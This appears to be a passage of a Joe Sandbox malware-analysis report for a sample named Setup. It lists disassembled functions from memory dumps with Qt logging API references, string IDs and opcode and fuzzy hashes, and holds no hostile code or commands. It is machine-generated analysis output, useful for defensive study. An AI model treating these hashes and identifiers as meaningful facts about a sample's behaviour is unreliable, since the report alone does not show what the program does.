                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Byte$ArrayArray@@DataInit_thread_footerPtr@@@
                                                                                                                                                              • String ID: Y-----
                                                                                                                                                              • API String ID: 4174580304-2754263011
                                                                                                                                                              • Opcode ID: a0bc6a6652a5b6b6a32738771b26e9ebf2b22981423fa1d70e785d1c942302f1
                                                                                                                                                              • Instruction ID: 0187f1dfc0baa7b7becf7e2aadb6bb0155e6b8e55130442617f41fd7250a79b2
                                                                                                                                                              • Opcode Fuzzy Hash: a0bc6a6652a5b6b6a32738771b26e9ebf2b22981423fa1d70e785d1c942302f1
                                                                                                                                                              • Instruction Fuzzy Hash: 0711CCA5D0EA8385EB928B35F8502B42760AF54761F44923BCD7E462A2FF7C6C84CF04
                                                                                                                                                              Function 00007FFBA1A24C80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Byte$ArrayArray@@DataInit_thread_footerPtr@@@
                                                                                                                                                              • String ID: ----
                                                                                                                                                              • API String ID: 4174580304-645692374
                                                                                                                                                              • Opcode ID: 1e0aa4c0a9ee1d6fe547411fdb5c5b820a306dba29894d05354981baba75be6d
                                                                                                                                                              • Instruction ID: 4489e5bc1801d3881084a8ade3abc068bdcb30c962eea58bbd2c82769d1f0d32
                                                                                                                                                              • Opcode Fuzzy Hash: 1e0aa4c0a9ee1d6fe547411fdb5c5b820a306dba29894d05354981baba75be6d
                                                                                                                                                              • Instruction Fuzzy Hash: 69119CA0D0EA8685EBD38B39E84127427A0AB56B54F449237CD7E462A1FF3C69958F00
                                                                                                                                                              Function 00007FFBA1A24FA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Byte$ArrayArray@@DataInit_thread_footerPtr@@@
                                                                                                                                                              • String ID: -----
                                                                                                                                                              • API String ID: 4174580304-4165711970
                                                                                                                                                              • Opcode ID: 5897a937d0657901db08a78fcfda4fe381024fe8c4993a3a2b325aa3716c7e4e
                                                                                                                                                              • Instruction ID: d75b95be0c7c33a9a06102fcd115e04456482d4ab820ea86781365d1e9cf6dd8
                                                                                                                                                              • Opcode Fuzzy Hash: 5897a937d0657901db08a78fcfda4fe381024fe8c4993a3a2b325aa3716c7e4e
                                                                                                                                                              • Instruction Fuzzy Hash: A41199A4D0EA8685FB929B75E8557706361AB94764F009237DE7E422B1FF3C7D848F00
                                                                                                                                                              Function 00007FFBA1A25380 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Byte$ArrayArray@@DataInit_thread_footerPtr@@@
                                                                                                                                                              • String ID: ---
                                                                                                                                                              • API String ID: 4174580304-2854292027
                                                                                                                                                              • Opcode ID: 09d2e2691380cfe7c4abc859867a2802f76c83ad8d4416a60d519fb4017000bc
                                                                                                                                                              • Instruction ID: 502d165740378a50a79887264b94de07cb547ad98cc35f2dedb4432f0cf8ba75
                                                                                                                                                              • Opcode Fuzzy Hash: 09d2e2691380cfe7c4abc859867a2802f76c83ad8d4416a60d519fb4017000bc
                                                                                                                                                              • Instruction Fuzzy Hash: 7011AAA4D0EA8681FB928B35E8502742360BB95754F449636DD7E462A1FF7C69888E00
                                                                                                                                                              Function 00007FFBA1A1E9F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Init_thread_footerLogging
                                                                                                                                                              • String ID: qt.network.ssl
                                                                                                                                                              • API String ID: 189896515-2426049154
                                                                                                                                                              • Opcode ID: f7a25e9799750086e2e341fbb7e0eccd3d3779b41736579b2c4320733e9aead9
                                                                                                                                                              • Instruction ID: eb173b2b9274547e1879d3abd6beb00e0e999f5c0c821da9de5b34c37d3783cd
                                                                                                                                                              • Opcode Fuzzy Hash: f7a25e9799750086e2e341fbb7e0eccd3d3779b41736579b2c4320733e9aead9
                                                                                                                                                              • Instruction Fuzzy Hash: 60012CA1E1E98686EB92DB34F8510B42311BF80761F845137CC3E522A1FF2CAD89CF04
                                                                                                                                                              Function 00007FFBA19A9AC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,0147AE14,00007FFBA19D9E67,?,?,?,?,?,?,?,?,00000000,00007FFBA198414C), ref: 00007FFBA19A9B1C
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA19A9B35
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Init_thread_footerLogging
                                                                                                                                                              • String ID: qt.network.http2
                                                                                                                                                              • API String ID: 189896515-693620304
                                                                                                                                                              • Opcode ID: 93596d21d1b4f2b809371fab82d140d3c76b8d344c153789d2d25e1b1f1aef41
                                                                                                                                                              • Instruction ID: bc93db28686f6f96b87e5cd302b14b126a6ae7b3ca33cc475d204e95658917e0
                                                                                                                                                              • Opcode Fuzzy Hash: 93596d21d1b4f2b809371fab82d140d3c76b8d344c153789d2d25e1b1f1aef41
                                                                                                                                                              • Instruction Fuzzy Hash: BF0108E0A0E94292EB82DB75E8500B52311FF84B60F845133CD2D022A1FF3CE989CF44
                                                                                                                                                              Function 00007FFBA1A00560 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,00000000,00007FFBA19FF3B2,?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA1A005BC
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA1A005D5
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Init_thread_footerLogging
                                                                                                                                                              • String ID: qt.network.monitor
                                                                                                                                                              • API String ID: 189896515-2477741448
                                                                                                                                                              • Opcode ID: 2b6d89c5e74d874aae5eaf0b8dcb2eef61d9206672a302a6ba8f406e2a2920fd
                                                                                                                                                              • Instruction ID: 9eab7c010cb31fb86536118903598dcbbd3c112ee2341568de01dfd5578be507
                                                                                                                                                              • Opcode Fuzzy Hash: 2b6d89c5e74d874aae5eaf0b8dcb2eef61d9206672a302a6ba8f406e2a2920fd
                                                                                                                                                              • Instruction Fuzzy Hash: 7701DAA5E1EA42D6EB829B74E8610B43310BF84760F844133CD2E462B1FF2CAD95CF00